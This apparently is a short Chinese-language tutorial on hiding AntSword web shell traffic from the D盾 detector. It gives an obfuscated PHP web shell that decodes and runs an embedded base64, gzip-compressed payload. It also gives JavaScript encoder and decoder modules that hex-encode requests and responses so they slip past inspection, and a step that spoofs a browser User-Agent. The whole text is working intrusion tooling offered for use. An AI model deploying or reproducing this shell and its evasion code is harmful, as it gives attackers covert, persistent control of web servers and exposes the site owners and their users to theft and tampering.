蚁剑流量加密，过D盾哟

马儿

<?php
class KIXT{
function __destruct(){
$GVTF=’P@Uy=FkZzQL*]tj’^”\x33\x32\x30\x18\x49\x23\x34\x3c\xf\x3f\x2f\x5e\x34\x1b\x4″;
@$GVTF=$GVTF(”,$this->NRJZ);
return @$GVTF();
}
}
$kixt=new KIXT();
@$kixt->NRJZ=gzuncompress(base64_decode(“eJzj5UrLL0pNTM7QUIkP8A8OUUgsVlDJVrC1U1Ap06zm5eJUyQbyFBwKEpOzNZQ8tJR0gNKa1iAJsPpooHysLYp0GUi6lpfLIbUsMQdqbLR6QWJxsXosSAoAv5gdqw==”));
?>

编码器

/**
* php::base64编码器
* Create at: 2020/05/04 21:34:10
*/

‘use strict’;

/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
// ########## 请在下方编写你自己的代码 ###################
//把payload丢给pass参数，以供shell执行payload代码。
console.log(JSON.stringify(data));
let ret = {};
for (let _ in data) {
if (_ === ‘_’) {
//payload默认再data[_]内, 要替换。
let pwds = Buffer.from(pwd).toString(‘hex’);
ret[pwds] = Buffer.from(data[_]).toString(‘hex’);
}else{
let aa = Buffer.from(_).toString(‘hex’);
ret[aa] = Buffer.from(data[_]).toString(‘hex’);
}
}

return ret;

/*
data[pwd] = Buffer.from(data[‘_’]).toString();

delete data[‘_’];
console.log(pwd);
console.log(JSON.stringify(data));
// 返回编码器处理后的 payload 数组
return data;
*/
}

解码器

/**
* php::base64解码器
* Create at: 2020/05/04 22:16:46
*/

‘use strict’;

module.exports = {
/**
* @returns {string} asenc 将返回数据base64编码
* 自定义输出函数名称必须为 asenc
* 该函数使用的语法需要和shell保持一致
*/
asoutput: () => {
return `function asenc($out){
$hexs = @base64_encode($out);
return @bin2hex($hexs);
}
`.replace(/\n\s+/g, ”);
},
/**
* 解码 Buffer
* @param {string} data 要被解码的 Buffer
* @returns {string} 解码后的 Buffer
*/
decode_buff: (data, ext={}) => {
console.log(data.toString());
let ret = Buffer.from(data.toString(), ‘hex’);
let ret1 = Buffer.from(ret.toString(), ‘base64’);
//console.log(ret1.toString());
return ret1;
}
}

更改UA

1、连接shell时，自定义请求头：

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36